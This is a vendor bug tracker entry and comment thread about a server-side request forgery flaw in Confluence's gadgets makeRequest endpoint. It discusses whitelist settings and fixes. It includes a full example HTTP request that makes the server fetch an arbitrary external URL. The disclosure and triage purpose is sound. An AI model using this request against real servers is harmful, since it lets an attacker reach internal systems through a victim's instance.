-
Bug
-
Resolution: Cannot Reproduce
-
Highest
-
None
-
6.6.3
-
1
-
Severity 2 - Major
-
Confluence installations have permissive whitelist that allows to fetch any URL using confluence like as the proxy.
Use GET request GET /plugins/servlet/gadgets/makeRequest?url=
Example:
to get Yandex start page or any resource you want.
GET /plugins/servlet/gadgets/makeRequest?url=http://ya.ru HTTP/1.1 Host: xxxxxxxxxxxxxxxxxxxxxx User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: s_cc=true; s_nr=1521467033623-New; s_vnum=1522558800623%26vn%3D1; s_sq=%5B%5BB%5D%5D DNT: 1 X-Atlassian-Token: no-check Connection: close Upgrade-Insecure-Requests: 1
Update
This issue was fixed in Confluence version 4.2.14. If you are experiencing this issue in a newer version of Confluence then please check the configuration of the in product whitelist as per https://confluence.atlassian.com/doc/configuring-the-whitelist-381255821.html.
- has action
-
SECENG-1867 Failed to load
- relates to
-
AG-1502 Failed to load
[CONFSERVER-55981] SSRF via REST API /plugins/servlet/gadgets/makeRequest
mweber3: Certainly! I think there is some confusion; the outbound proxy is not a solution, but a possible cause of the problem.
By default, the bug you're describing has been fixed since Confluence v4.2.14 via an outbound requests filter/whitelist (as seen in the linked Ecosystem ticket AG-1502).
But that filtering may have been disabled on your Jira, which would cause the bug to appear.
One way the filtering might be disabled is if there were an outbound proxy on your Jira, because your traffic through the proxy would not be beholden to the filter.
May I ask if you're aware of any such proxy being on your Jira?
Hi, thanks for getting back to me. Would be your solution really, that we have to configure an outbound proxy in order to close this vulnerability?
Some more details would be great. We don't want to customize our Jira configuration/settings that much and want to stay out-of-the-box as much as possible! That makes it easier for upgrades or additional nodes.
mweber3, can you please comment in regards to Anton's last question?
Further investigation reveals that the bug has been seen before (as in the linked Ecosystem ticket AG-1502) but was fixed in Confluence version 4.2.14 via an outbound requests filter/whitelist. However, the filtering can be disabled.
mweber3, may I ask if you've disabled the whitelist on outbound requests - that is, your Confluence instance does not filter outbound requests? For example, have you created an outbound proxy?
Hi mkhairuliana, I haven't been able to reproduce the bug locally and therefore couldn't find a workaround. The bug may be dependent on a specific gadget installed on the Confluence instance.
Hi ablack@atlassian.com, Do you know if there's any workaround for this issue?
Hi Anton,
thanks for your response. You DON'T need admin privileges to invoke the SSRF!
This was reported us by a Hacker from hacker.one - Very detailed description. He was able to run several HTTP PUT commands from our external facing Confluence instance!
Michael
mweber3: Thanks for clarifying that! We'll follow this up on the support ticket.